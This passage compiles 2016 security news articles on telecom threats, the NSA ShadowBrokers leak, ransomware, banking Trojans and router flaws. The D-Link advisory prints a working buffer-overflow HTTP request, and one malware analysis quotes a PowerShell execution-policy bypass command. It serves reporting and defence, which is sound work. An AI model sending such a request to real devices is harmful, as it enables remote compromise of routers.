Social engineers and phishers also use multiple ways for increasing the likeness of authenticity in their attacks, enriching their data with leaked profiles, or successfully impersonating employees or contractors. Recently criminals have successfully stolen tens of thousands of euros from dozens of people across Germany after finding a way around systems that text a code to confirm transactions to online banking users. After infecting their victims with banking malware and obtaining their phone numbers, they called the CSP’s support and, impersonating a retail shop, asked for a new SIM card to be activated, thus gaining access to OTP (One Time Passwords) or “mTan’s” used for two-factor authentication in online banking.

Kaspersky Lab recommends that telecommunications providers implement notification services for financial organizations that alert them when a subscriber’s SIM card has been changed or when personal data is modified.

Some CSPs have also implemented a threat exchange service to inform financial industry members when a subscriber’s phone is likely to have been infected with malware.

Vulnerable kit

USBs, modems and portable Wi-Fi routers remain high-risk assets for subscribers, and we continue to discover multiple vulnerabilities in their firmware and user interfaces. These include:

Vulnerabilities in web interfaces designed to help consumers configure their devices. These can be modified to trick a user into visiting a specially crafted page.
Vulnerabilities that result from insufficient authentication. These can allow for the modification of device settings (like DNS server addresses), and the interception, sending and receiving of SMS messages, or USSD requests, by exploiting different XSS and CSRF vulnerabilities.
RCE (Remote Code Execution) vulnerabilities based on different variants of embedded Linux that can enable firmware modification and even a complete remote compromise.

Built-in “service” backdoor allowing no-authentication access to device settings

Examples of these kind of vulnerabilities were demonstrated in research by Timur Yunusov from the SCADAStrangeLove team. The author assessed a number of 3G/4G routers from ZTE, Huawei, Gemtek and Quanta. He has reported a number of serious vulnerabilities:

Remote Code Execution from web scripts.
Arbitrary device firmware modification due to insufficient consistency checks.
Cross Site Request Forgert and Cross Site Scripting attacks.
All these vectors can be used by an external attacker for the following scenarios:

Infecting a subscriber’s computer via PowerShell code or badUSB attack.
Traffic modification and interception.
Subscriber account access and device settings modification.
Revealing subscriber location.
Using device firmware modification for APT attack persistence.
Most of these issues exist due to web interface vulnerabilities (like insufficient input validation or CSRF) or modifications made by the vendor during the process of branding its devices for a specific telecommunications company.

The risk of local cells

Femtocells, which are essentially a personal NodeB with an IP network connection, are growing in popularity as an easy way to improve signal coverage inside buildings. Small business customers often receive them from their CSPs. However, unlike core systems, they are not always submitted to suitably thorough security audits.


Femtocell connection map

Over the last year, our researchers have found a number of serious vulnerabilities in such devices that could allow an attacker to gain complete control over them. Compromising a femtocell can lead to call interception, service abuse and even illegal access to the CSP’s internal network.

At the moment, a successful attack on a femtocell requires a certain level of engineering experience, so risks remain low – but this is likely to change in the future.

USIM card vulnerabilities

Research presented at BlackHat USA in 2015 revealed successful attacks on USIM card security. USIMs had previously been considered unbreakable thanks to the AES-based MILENAGE algorithm used for authentication. The reseachers conducted differential power analysis for the encryption key and secrets extraction that allowed them to clone the new generation of 3G/4G SIM cards from different manufacturers.


Right byte guess peak on differential power analysis graph


Telecommunications is a critical infrastructure and needs to be protected accordingly. The threat landscape shows that vulnerabilities exist on many levels: hardware, software and human, and that attacks can come from many directions. Telecoms providers need to start regarding security as a process – one that encompasses threat prediction, prevention, detection, response and investigation.

A comprehensive, multi-layered security solution is a key component of this, but it is not enough on its own. It needs to be complemented by collaboration, employee education and shared intelligence. Many telecommunications companies already have agreements in place to share network capability and capacity in the case of disruption, and now is the time to start reaping the benefit of shared intelligence.

Our Threat Intelligence Reporting services can provide customer-specific insight into the threats facing your organization. If you’ve ever wondered what your business looks like to an attacker, now’s the time to find out.

Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It
21.8.2016 thehackernews IT
If your webcam has stopped working after installing recently-released Microsoft's big Anniversary Update for Windows 10, you are not alone.
With some significant changes to improve Windows experience, Windows 10 Anniversary Update includes the support for webcams that has rendered a number of different webcams inoperable, causing serious issues for not only consumers but also the enterprise.
The problem is that Microsoft added some new ways for applications to access webcams with Microsoft's new Windows Camera Frame Server, preventing webcams from using two particular compression formats—H.264 and MJPEG.
Microsoft decided that the Camera Frame Server should only receive an uncompressed YUY2 encoding stream from the webcam, which is affecting far more devices than Microsoft expected, causing Millions of cameras to crash.
This is the reason why your camera hangs, freezes, or simply not works when you try to do a video calling with your friend over Skype. Brad Sams of Thurrot first discovered this issue.
"Since it will take some extra time for the H.264 work to go through this additional layer of testing, and we would prefer not to delay the MJPEG changes [fix], we will ship these two separately. You can expect the MJPEG media type work to reach you first," reads a post in Microsoft's Support Forum from Windows Camera Team member Mike M.
Although Microsoft has planned to fix the issue and roll out an official fix in September, Windows users who do not want to wait for a month for Microsoft's update can use a workaround suggested by Rafael Rivera to re-enable the old behavior of webcam and fix the issue.
Here's how to Fix Your Webcam:
The workaround is a registry hack, so if you are comfortable tweaking the registry, make the below changes. The hack is pretty simple; you just need to stick to the following instructions.
Go to the Start Menu, type "regedit" and press Enter. This opens 'The Registry Editor'.
Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Foundation\Platform" in the left sidebar.
Right-click the "Platform" key and select New → DWORD (32-bit) Value.
Name this value "EnableFrameServerMode" and set the value to "0" by double clicking on it.
These are the steps if you are using a 32-bit version of Windows 10.
If you are using a 64-bit version of Windows 10, you will need to navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Media Foundation\Platform" in the left sidebar and follow step 3 and 4 mentioned above.
Now close the registry editor and just re-launch the application in which your webcam was freezing. They should now work normally – no reboot, no sign out required.
When Microsoft actually fixes the issue after a month, just revisit the same location in the registry editor and delete the "EnableFrameServerMode" value you added to undo this change.
The hack is simple but follow the above steps correctly because a small mistake in The Registry Editor tool can render your system unstable or even inoperable.

Bitcoins move from the seized SilkRoad wallet to the ShadowBrokers
21.8.2016 securityaffairs Security

A security expert noticed strange transactions from the Bitcoin wallet of the SilkRoad (now in the hands of Feds) to the ShadowBrokers ‘ wallet.
I was surfing the Internet searching for interesting data about the ShadowBrokers group that leaked exploits and hacking tools belonging to the NSA Equation Group.

I have found a very intriguing analysis of the popular security researcher krypt3ia that has analyzed the Bitcoin transactions linked to the #ShadowBrokers account. It seems that the account is receiving small amounts of money (at about $990.00 a couple of days ago), but the real surprise is that some of the payments are coming from the seized Silk Road bitcoins and account. 

Bitcoin The ShadowBroker account

Hey, wait a moment, the Silk Road Bitcoin are under the control of the FBI after the seizure of the popular black market.

krypt3ia decided to investigate the overall transactions and discovered that also the US Marshall service was involved in the transfers.

“So, is this to say that these coins are still in the coffers of the feds and they are being sent to ShadowBrokers to chum the water here? Maybe get a conversation going? Maybe to get the bitcoins flying so others can trace some taint? Of course once you start to look at that address and the coins in and out there you get some other interesting hits. Suddenly you are seeing US Marshall service as well being in that loop. Which makes sense after the whole thing went down with the theft of coins and such by rogue agents of the USSS and DEA.” wrote krypt3ia in a blog post.

Analyzing the transactions the expert noticed transactions of 0,001337 BTC for the for ShadowBrokers.

Bitcoin The ShadowBroker account 2

We are aware that Silk Road coins are in the hands of the US GOV, but someone is sending ShadowBrokers fractions of them.

“What if, and you can see this once you start to dig around with Maltego, the coins being paid to the account so far also come from other accounts that are, shall we call them cutout accounts for the government?” added the experts.

At this point, the researcher invited readers to analyze transactions involving all the accounts that passed money to Bitcoin Wallets used by the Government and that were used to transfer money to the ShadowBrokers.

At the time I’m writing the ShadowBroker wallet was involved in 41 transactions for a total of 1.738 BTC, and the highest bidder is of 1.5 bitcoin, or around $850.

NSA BENIGNCERTAIN tool can obtain VPN Passwords from CISCO PIX
21.8.2016 securityaffairs Safety

Researchers tested the BENIGNCERTAIN tool included in the NSA data dump that allows attackers to extract VPN passwords from certain Cisco devices.
Following the disclosure of the NSA dump, IT vendors Cisco and Fortinet issued security patches to fix the flaws exploited by the Equation Group in their products.


Now, security researchers have uncovered another exploit included in the leaked dump, dubbed BENIGNCERTAIN that allows the extraction of VPN passwords from certain Cisco devices.

The expert Mustafa Al-Bassam who analyzed the data dump has called the attack “PixPocket” after the name of the Cisco products hacked by the tool, the Cisco PIX.

The CISCO PIX product family was declared phase out back in 2009, but it is widely adopted by government entities and enterprises.

According to the expert, the tool works against the CISCO PIX versions 5.2(9) up to 6.3(4).

Al-Bassam discovered that the tool could be used to send a packet to the target machine that makes it dump a portion of the memory that includes the VPN’s authentication password.

The security expert Brian Waters also tested the BENIGNCERTAIN exploits confirming that it works.

Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
Brian H₂O's @int10h
I can confirm that BENIGNCERTAIN works against real hardware @XORcat @GossiTheDog @musalbas @marcan42 @msuiche
07:49 - 19 Ago 2016
148 148 Retweet 115 115 Mi piace
“it’s a PIX 501 running 6.3(5)145; and I used v1110 of the exploit” added 501 running 6.3(5)145; and I used v1110 of the exploit” added Waters in a second Tweet, this means that the BENIGNCERTAIN could work also against other versions of the PIX.

This means that NSA could have remotely sent a packet to a target VPN to obtain its preshared key and decrypt the traffic.

Cisco published the blog post titled “The Shadow Brokers EPICBANANAS and EXTRABACON Exploits” to provide further details about its investigation of the tools included in the arsenal of the Equation Group leaked online.

The Cisco security team is still investigating the content of the leaked data dump to verify the if other hacking tools could be exploited against its products.

“On August 19th, articles were release regarding the BENIGNCERTAIN exploit potentially being used to exploit legacy Cisco PIX firewalls. Our investigation so far has not identified any new vulnerabilities in current products related to the exploit. Even though the Cisco PIX is not supported and has not been supported since 2009 (see EOL / EOS notices), out of concern for customers who are still using PIX we have investigated this issue and found PIX versions 6.x and prior are affected. PIX versions 7.0 and later are confirmed to be unaffected by BENIGNCERTAIN. The Cisco ASA is not vulnerable.” wrote CISCO.

Is security enabling or compromising productivity?

20.8.2016 netsecurity Hacking

While most organizations fundamentally believe connecting people to the best technology is vital to business productivity, many struggle to achieve agility due to traditional on-premise security mindsets, according to an Okta survey of 300 IT and security professionals.

Failing to adapt and upgrade security tools is putting organizations at risk. 65% of respondents think that a data breach will happen within the next 12 months if they do not upgrade legacy security solutions in time.

“In order to be more productive, organizations worldwide are investing in cloud and mobile technologies, enabling their staff to work from virtually anywhere. But this isn’t enough to ensure true agility. As organizations become increasingly connected, the traditional idea of the enterprise network boundary is vanishing and businesses need to prioritise strong security,” said David Baker, CSO at Okta. “To successfully navigate the new perimeter and avoid compromising on security and productivity, IT leaders need to adopt tools that span traditional company and network boundaries and enable agility across the organization.”

Organizations are unsure if security is enabling or compromising productivity and agility

When asked if security measures compromised or enabled productivity in their organization, respondents’ opinions were mixed. Just over half (52%) said that their current security solutions compromise productivity, while 48% believe their security measures enable the organization to adopt best of breed solutions that enable productivity and agility.

Visibility into application usage is limited

Okta’s research shows that 85% of IT leaders suffer from a lack of insight over who has access to applications within their organization. Even more worrying, 80% of respondents pointed to weak passwords or weak access controls as a security issue.

Investing in new mobile, automation, and cloud technologies is paying dividends for organizations

92% of respondents believe their organization could do more to integrate and support cloud applications into their infrastructure and systems. This reveals a massive opportunity for IT teams to further drive agility and productivity, and the chance to drive this percentage down.

Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers
20.8.2016 thehackernews Hacking
Another day, another bad news for Bitcoin users.
A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most likely be targeted by "state-sponsored attackers."
Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 Million worth of Bitcoins.
Now, Bitcoin.org, the website that hosts downloads for Bitcoin Core, posted a message on its website on Wednesday warning users that the next version of the Bitcoin Core wallet, one of the most popular bitcoin wallets used to store bitcoins, might be replaced with a malicious version of the software offered by government-backed hackers.
Specifically, Chinese bitcoin users and services are encouraged to be vigilant "due to the origin of the attackers."
Bitcoin.org doesn't believe it has sufficient resources to defend against the attack. However, the website did not reveal the name of the country planning the attack.
The Warning Message from the Bitcoin.org site reads:
"Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers. As a website, Bitcoin.org does not have the necessary technical resources to guarantee that we can defend ourselves from attackers of this calibre. We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website."
"In such a situation, not being careful before you download [the software] could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network."
Also Read: Bitcoin Exchange Offers $3.5 Million Reward for Information of Stolen Bitcoins.
In such cases, it is likely that hackers will try to hijack and replace the official binary files used to run Bitcoin software on mining pools, either:
By compromising the Bitcoin.org official site
By conducting a man-in-the-middle attack to fake a cryptographic certificate that would allow hackers to intercept victim’s encrypted HTTPS connection and replace the legitimate download with a malicious one, tricking users into installing a malicious version of the Bitcoin software.
However, Bitcoin Core developer Eric Lombrozo told The Reg that "there's absolutely nothing in the Bitcoin Core binaries, as built by the Bitcoin Core team, that has been targeted by state-sponsored attackers that we know of at this point."
"Perhaps certain sites where people download the binaries could end up getting compromised, but let's not unnecessarily spread paranoia about the Bitcoin Core binaries themselves."
Verify Signatures and Hashes
As a countermeasure, users are recommended to verify the Signature securely and hashes of Bitcoin Core binaries that are cryptographically signed with a key before running Bitcoin Core binaries to ensure the binaries are legitimate as being created by the Core developers team.
"We strongly recommend that you download that key, which should have a fingerprint of 01EA5486DE18A882D4C2684590C8019E36C2E964. You should securely verify the signature and hashes before running any Bitcoin Core binaries," the advisory states.
Moreover, you are advised to download the binaries from the official Bitcoin site only; otherwise, you may end up getting compromised.

Omegle, the Popular 'Chat with Strangers' Service Leaks Your Dirty Chats and Personal Info
20.8.2016 thehackernews Security
Ever since the creation of online chat rooms and then social networking, people have changed the way they interact with their friends and associates.
However, when it comes to anonymous chatting services, you don't even know what kinds of individuals you are dealing with.
Sharing identifiable information about yourself with them could put you at risk of becoming a victim of stalking, harassment, identity theft, webcam blackmail, and even phishing scams.
Have you heard of Omegle? The popular, free online anonymous chat service that allows you to chat with random strangers, without any registration. The service randomly pairs you in one-on-one chat window where you can chat anonymously over text or webcam.
But, are your chats actually Anonymous?
No, all your chats are recorded and saved by the service. So, if you have shared your personal details such as your name, phone number, or email address, with anyone over the service, you are no more anonymous.
Even the website describes its service as, "When you use Omegle, we pick someone else at random and let you talk one-on-one. To help you stay safe, chats are anonymous unless you tell someone who you are (not suggested!), and you can stop a chat at any time."
And here comes the worst part:
The recorded online conversations are saved in such a way that anyone with a little knowledge of hacking can pilfer them, revealing your personal information along with those dirty chats that could be used to harass or blackmail you.
Indrajeet Bhuyan (@Indrajeet_b), a young Indian bug hunter, has shown The Hacker News that how Omegle is saving screenshots of every 'so-called' anonymous chat session at a specific location on their web server, which could be downloaded by anyone with little knowledge of website structure.
Bhuyan wrote a simple python script, Omegle-Chat-Hack, that automatically downloads the saved screenshots from the website.
As a proof-of-concept, he also published some of those screenshots, showing how easily people, especially teenagers, share their personal details and contact info with strangers on a service, where they are supposed to stay anonymous.
"People on Omegle often think their chats are private and automatically get deleted once they disconnect from the conversation," Bhuyan told me. "Due to this false sense of security, people often share their sensitive information on the service. Omegle-Chat-Hack is a tool that demonstrates how insecure these online chat services are and how one can read your private messages sent over the service."
So, you should be careful with what identifiable information you are sharing over such online service while chatting with strangers. The more personal information you share, the more chances there are for others to misuse your information.
Frankly, you should take your online privacy very seriously.

Brazilian banking Trojans meet PowerShell
20.8.2016 Kaspersky Virus
Crooks are always creating new ways to improve the malware they use to target bank accounts, and now Brazilian bad guys have made an important addition to their arsenal: the use of PowerShell. Brazil is the most infected country worldwide when it comes to banking Trojans, according to our Q1 2016 report, and the quality of the malware is evolving dramatically. We found Trojan-Proxy.PowerShell.Agent.a in the wild a few days ago, marking a new achievement by Brazil’s cybercriminals.

The malware is distributed using a malicious email campaign disguised as a receipt from a mobile operator with a malicious .PIF file. After the file is executed it changes the proxy configuration in Internet Explorer to a malicious proxy server that redirects connections to phishing pages for Brazilian banks. It’s the same technique used by malicious PACs that we described in 2013, but this time no PACs are used; the changes in the system are made using a PowerShell script. As Windows 7 and newer OS versions are now the most popular in Brazil, the malware will not face a problem running on victims’ computers.

The malware has no C&C communication. After execution it spawned the process “powershell.exe” with the command line “-ExecutionPolicy Bypass -File %TEMP%\599D.tmp\599E.ps1” aiming to bypass PowerShell execution policies. The .ps1 file in the temp folder uses random names. It’s a base64 encoded script capable of making changes in the system.

Brazilian banking Trojans meet PowerShell

After some deobfuscation we can see the goal of the script: to change the Internet Settings key and enable a proxy server on it:

Brazilian banking Trojans meet PowerShell

And this is the result in the browser of the victim – a small change in the proxy settings:

Brazilian banking Trojans meet PowerShell

This change will not only affect IE but all other browsers installed in the system as well, as they tend to use the same proxy configuration set on IE. The proxy domains used in the attack are listed below. All of them use dynamic DNS services and their goal is to redirect all traffic to a server located in the Netherlands (, where there are several phishing pages for Brazilian banks:


The malware also has other features of interest: it checks for the language of the OS and aborts if it’s not PTBR, a clever trick to avoid infecting Windows versions in languages other than Brazilian Portuguese.

To protect a network against malware that uses PowerShell, it is important to modify its execution, using administrative templates that only allow signed scripts. We are sure this is the first of many that Brazil’s bad guys will code.

Hash of the malware: cancelamento.pif -> MD5: 9419e7cd60487532313a43559b195cb0

Australian Police obtained access to the Love Zone Child Porn Site and Got 30 IPs from US
20.8.2016 securityaffairs Security

The Australian police had targeted the Love Zone child porn site, ran it for a while and managed to gain access at least to 30 US IPs.
Apart from FBI, there are other organizations that have tried to identify the participants of child porn websites, so that they could get their hands on them and make them pay. In fact, recently the Australian police managed to access a website called The Love Zone.

This is where they got to 30 US IPs at least. So, instead of Americans revealing IPs overseas and prosecuting them, it is the other way around here.

The website was in the dark web and used Tor. It was based in the US, which means that the Australian police (Queensland Police Service’s Task Force Argos, to be specific) had to hack them and access their sensitive data. At some point, over 29,000 members had already subscribed to the site, which is shocking news!

In order to lure the members of the site, the police sent a video file. The members wanted to open it, of course; it was relevant to their own preferences, after all!

More analytically:

“When a user clicked on that hyperlink, the user was advised that the user was attempting to open a video file from an external website. If the user chose to open the file, a video file containing images of child pornography began to play, and the [foreign law enforcement agency] captured and recorded the IP address of the user accessing the file. FLA configured the video file to open an Internet connection outside of the Network software, thereby allowing FLA to capture the user’s actual IP address, as well as a session identifier to tie the IP address to the activity of a particular user account.”

The whole investigation is not the same as that of the FBI and its 135 US cases. Yet, the Aussies handed over the evidence they had collected to the FBI. In this way, justice would finally emerge. It is worth pointing out that the owner of the Love Zone, Shannon McCoole, is serving a 35-year sentence for child sexual abuse.

It remains unclear whether or not the investigation of the Australian police was just against US targets.

As for the FBI, the only comments about the operation of the Love Zone were the following: “The FBI, led by its Legal Attaches in numerous countries around the world, seeks to foster strategic partnerships with foreign law enforcement, intelligence, and security services as well as with other US government agencies by sharing knowledge, experience, capabilities and by exploring joint operational opportunities.”

Iran investigates possible cyber attacks behind a string Oil Industry incidents
20.8.2016 securityaffairs Virus

Iran ’s cyberspace security authorities are investigating a string of fires in the country oil and gas facilities. Incidents or cyber sabotage?
Once again, something of strange is happening in Iran, the Government of Teheran is investigating a recent string of incidents occurred in critical infrastructure in the country.

The Iran’s Supreme National Cyberspace Council is investigating whether the oil and petrochemical fires were caused by cyber attacks, authorities fears that nation state actors may have launched an attack similar to Stuxnet.

The first incident occurred on July 6, in the Bouali petrochemical plant on the Persian Gulf coast, a couple of days after the fire was put out, a liquefied gas pipeline exploded in the Marun Oil and Gas Production Company, unfortunately, a worker died. On July 29 another fire occurred at the Bisotoon petrochemical plant.

The incidents were originally blamed on human error but after another explosion of a gas pipeline near Gonaveh the Iranian Petroleum Ministry started an investigation to understand the real cause of the anomalous string of incidents.

“The Iranian Petroleum Ministry, in charge of all of the affected sites denied the plants were sabotaged and the Iranian oil minister Bijan Namdar Zanganeh said the fires and explosions were due to technical faults and human error.” reported the Time.com “However when an explosion in a gas pipeline near Gonaveh, which killed a worker, and another fire in the Imam Khomeini petrochemical plant, occurred within hours of each other on Aug. 6, the ministry refused to comment until after investigations.“

Mr. Abolhassan Firouzabadi, the secretary of Iran’s Supreme National Cyberspace Council, confirmed that a team of investigators will work on the case trying to understand if the incidents are linked and if they were caused by a cyber attack.

fires cyber attacks Iran
Source The Tehrantimes.com

“Abolhassan Firouzabadi, secretary of Iran’s Supreme National Cyberspace Council, says a team of experts will look at the possibility of cyberattacks as being a cause, Press TV reported on Sunday.

Special teams will be sent to the afflicted sites to study the possibility of cyber systems having a role in the recent fires, he said.” reported the Tehran Times.

According to SCMagazine.com, Idan Udi Edry, CEO at Nation-E, speculates that the evidence leads experts into believing that the incidents being caused by a cyberattack.

“One indicator is that some of these attacks took place within hours of each other – some people may chalk this up to coincidence, but the fact that several of these incidences took place within a few weeks gives us reason to believe an attacker learned how to successfully implement a cyberattack on Iran’s oil and gas facilities, then continued to keep doing so on larger scales,” he told SCMagazine.com in an email.

This string of incidents raises the debate on the security of critical infrastructure and the dangers of cyber attack.

We all have in mind what has happened in 2010, when the systems at the Natanz nuclear facility were hit with the Stuxnet malware.

A new LOCKY ransomware campaign targets the healthcare
20.8.2016 securityaffairs Virus

Malware researchers at FireEye security firm have spotted a new Locky ransomware campaign mainly targeting the healthcare sector.
Security experts from FireEye have spotted a Locky ransomware campaign mainly targeting the healthcare sector, Telecom and Transportation industries.

Locky campaign August healthcare 2

Attackers launched a massive phishing campaign to deliver the threat. The campaign bit organizations worldwide, mostly in the US, Japan, South Korea.

Threat actors behind this Locky campaign leveraged on DOCM FORMAT email attachments to deliver the ransomware, instead Javascript based downloaders.

“From our trend analysis, Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August. This marks a change from the large campaigns we observed in March, where a JavaScript based downloader was generally being used to infect systems.” reads the report published by FireEye.

“These detection spikes and change in tactics suggest that the cybercriminals are investing more to infect systems and maximize their profits. Additionally, we have observed that the delivery of Dridex via this distribution channel seems to have stopped, or nearly so, which could explain why we are seeing the Locky uptick.”

The researchers believe crooks are investing to compromise systems maximizing their efforts. Another interesting trend reported by FireEye is the pause in the distribution of the Dridex banking Trojan through the same channel.

Experts noticed many similarities in the macro code used by Attackers in three distinct Locky campaigns running on Aug. 9, Aug. 11 and Aug. 15.

The following are the key comparisons:

Each email campaign has a specific “one-off” campaign code that is used to download the Locky ransomware payload from the malicious malware server.
The malicious URL embedded within macro code is encoded using the same encoding function, but with a different key for each campaign. Each character is encoded by multiplying its ASCII code with a specified key (an integer). Hence, its decoder would perform a division using the specified integer.
The downloaded payload is encoded using 32 bytes rolling XOR key. A different key is used for each campaign. Rolling XOR is described as follows:
Plain [i] = Cipher [i] ^ Key [i % length of Key], where Plain is the computed plain text, Cipher is the cipher text, Key is the xor key, and i is the byte offset.

The evidence collected by the researchers suggest the involvement of a single or multiple attackers in a coordinated effort.

Emails among dumps published by Wikileaks includes 300+ malware
20.8.2016 securityaffairs Virus

A malware researcher has analyzed the attachments of in the WikiLeaks email dumps and discovered more than 300 pieces of malware.
WikiLeaks has published more than 300 pieces of malicious code among its caches of dumped emails. Dr Vesselin Bontchev (@bontchev), a top Bulgarian malware researcher, has analyzed documents published by the organization and detected 324 instances of malware in its archive of dumped emails.

A check to the instance of malware allowed the malware expert to discover that the almost any instance appears to be an attachment of the dumped email.

The malicious codes are recognized by the Virus Total malware and URL online scanning service, they were likely sent by attackers to the recipients in the attempt to hack them.

“The following table contains the confirmed malware residing on the Wikileaks site. The list is by no means exhaustive; I am just starting with the analysis. But what is listed below is definitely malware; no doubts about it.” wrote Dr Bontchev on GitHub.

“The first column contains a link to the e-mail on the Wikileaks site that contains the malicious attachment. The e-mail itself is safe to view (although the text is usually spam/scam/phish/whatever).”

wikileaks email malware

The situation may be worse because the piece of malware found by the Bulgarian researchers were identified in an initial search effort.

If you want to test the malware adopt all the necessary countermeasures to avoid infecting your machine.

Fortunately, the piece of malware are well known to the principal antivirus solutions, according to the malware researcher, the majority of the malicious codes have a Virus Total detection rate from 80 to 100 percent.

Anyway … be careful managing email attachments from Wikileaks archives.

Remote code execution in D-Link routers

19.8.2016 Vulnerebility

D-Link has released new firmware for a number of routers to address a highly critical security vulnerability SB2016081203 (CVE-2016-5681). The affected routers are:

DIR-850L B1, DIR-822 A1, DIR-823 A1, DIR-895L A1, DIR-890L A1, DIR-885L A1, DIR-880L A1, DIR-868L B1, DIR-868L C1, DIR-817L(W) and DIR-818L(W).

The vulnerability exists within the cgibin binary, intended to handle session cookie. This binary is called from different parts of D-Link web interface, including the service, exposed through the WAN network interface on port 8181/TCP. A remote attacker can send a specially crafted "uid" cookie via the HTTP POST request to "/dws/api/Login" login page, cause buffer overflow and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may allow an attacker to obtain full access to vulnerable device and use it to gain access to local network.

Public exploit code was also released by D-Link support website. Below is a dump of HTTP POST request, which can be used to trigger a buffer overflow:

----------------- REQUEST:
POST /dws/api/Login HTTP/1.1
Host: IP:8181
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: uid="A"*3220 + "AAAA" + "BBBB" +"CCCC" +"DDDD" +"EEEE" +"FFFF" +"GGGG" +"HHHH" +"XXXX" << This causes the stack buffer overflow
Connection: close

To resolve this vulnerability we recommend to install the latest version of firmware, available from vendor’s website:

DIR-850L Rev. B1 Official FW v2.07 (v2.07WWB05)
DIR-817 Rev. Ax Official FW End Aug. 2016
DIR-818L Rev. Bx Beta FW v2.05b03beta03 End Aug. 2016
DIR-822 Rev. A1 Official FW v3.01 (v3.01WWb02)
DIR-823 Rev. A1 Official FW v1.00 (v1.00WWb05)
DIR-895L Rev. A1 Official FW v1.11 (v1.11WWb04)
DIR-890L Rev A1 Official FW v1.09 (v1.09b14)
DIR-885L Rev. A1 Official FW v1.11 (v1.11WWb07)
DIR-880L Rev. A1 Official FW v1.07 (v1.07WWb08)
DIR-868L Rev. B1 Official FW v2.03 (v2.03WWb01)
DIR-868L Rev. C1 Official FW v3.00 (v3.00WWb01)
We also would suggest to filter all traffic on TCP port 8181 at least on WAN interface.

Compromising Linux virtual machines via FFS Rowhammer attack

19.8.206 helpnetsecurity Attack

A group of Dutch researchers have demonstrated a variant of the Rowhammer attack that can be used to successfully compromise Linux virtual machines on cloud servers.

The Flip Feng Shui (FFS) attack is not performed by triggering a software vulnerability. Instead, it relies on exploiting the widespread Rowhammer DRAM glitch to induce bit flips in controlled physical memory pages, and the Linux’ memory deduplication system.

Compromising Linux virtual machines by taking advantage of memory deduplication

A short version of the attack sequence goes like this:

“An attacker rents a virtual server on the same host as your virtual server. Next, the attacker ensures that the hypervisor deduplicates a certain part of the memory that both virtual servers share. That means that both systems store certain information that they both process, in the same part of the physical memory. By employing the so-called rowhammer technique, the attacker is able to change the information in this memory without the hypervisor or your virtual server noticing.”

The researchers were able to perform two attacks on servers running Debian and Ubuntu. In the first one they made the server download malware instead of a software update, and in the second one they managed to access the target’s VM by corrupting their OpenSSH public keys.

According to a fact sheet published by the National Cyber Security Centre (NSCS) of the Dutch government, the attack can be leveraged against virtual machines on workstations as well as servers, but the attacker needs to have access to another virtual machine on the same host.

As the researchers didn’t publish attack code, replicating these attacks is out of reach for most low level attackers, but not for a criminal organization or a foreign intelligence service, NSCS noted.

Temporary solutions to this problem include disabling memory deduplication in the configuration of the hypervisor, or switching to (less efficient) zero-page deduplication.

The researchers informed OpenSSH, GnuPG, VM monitor vendors, and Debian and Ubuntu of the results of their researcher, and GnuPG has already strengthened their key signature checks to protect against the attack.

More technical details about the attack and video demonstrations can be found here and here.

Microsoft Open Sources PowerShell; Now Available for Linux and Mac OS X
19.8.2016 thehackernews IT
'Microsoft loves Linux' and this has never been so true than now.
Microsoft today made its PowerShell scripting language and command-line shell available to the open source developer community on GitHub under the permissive MIT license.
The company has also launched alpha versions of PowerShell for Linux (specifically Red Hat, Ubuntu, and CentOS) and Mac OS X, in addition, of course, to Windows.
Now, people can download binaries of the software, as well as access source code of the app from the new PowerShell GitHub page.
"Users across Windows and Linux, current and new PowerShell users, even application developers can experience a rich interactive scripting language as well as a heterogeneous automation and configuration management that works well with your existing tools," Microsoft says in its blog post.
"Your PowerShell skills are now even more marketable, and your Windows and Linux teams, who may have had to work separately, can now work together more easily."
PowerShell is Microsoft’s command line shell for Windows power users, and an extensible scripting language for automating system tasks.
Microsoft is aware that the company now operates in a "multi-platform, multi-cloud, multi-OS world." Since PowerShell is built on Microsoft's .NET platform, the company brought .NET Core, the version of .NET which runs cross-platform, to bring PowerShell to other platforms.
Microsoft has already planned to ship PowerShell "Core" with Nano Server for Windows Server 2016, and the newly announced release will run on .NET Core on Mac as well as Linux.
Although this recent release of PowerShell is Alpha-based and community supported, an official Microsoft version of PowerShell based on open source to anyone running a supported version of Windows will be published in the future, Microsoft notes.

Bitcoin.org warns state-sponsored attacks against the Bitcoin Core
19.8.2016 securityaffairs Hacking

The organization that controls the development of the Bitcoin software warns users that nation-state actors may hit the upcoming Bitcoin Core release.
The organization that controls the development of the Bitcoin system, Bitcoin.org, has warned of possible cyber attacks coordinated by nation-state attackers.

Bitcoin Core is the open source client for Bitcoin, the version Bitcoin Core 0.12.1 was released in April and a new one will be soon available (version 0.13.0).

This week, Bitcoin.org published a security notice to inform users that it is possible that the Bitcoin Core 0.13.0 version will be targeted by state-sponsored hackers.

“Bitcoin.org has reason to suspect that the binaries for the upcoming Bitcoin Core release will likely be targeted by state-sponsored attackers.” states the security notice.

“We ask the Bitcoin community, and in particular the Chinese Bitcoin community to be extra vigilant when downloading binaries from our website,”

The organization is warning is a specific way the Chinese Bitcoin community, inviting it to be vigilant and to adopt all the necessary measured to avoid security breaches.

When dealing with a persistent attacker such as a nation-state actor in is necessary a supplementary effort of the entire community due to the abilities of the adversaries.

“In such a situation, not being careful before you download binaries could cause you to lose all your coins. This malicious software might also cause your computer to participate in attacks against the Bitcoin network. We believe Chinese services such as pools and exchanges are most at risk here due to the origin of the attackers,” Bitcoin.org warned.

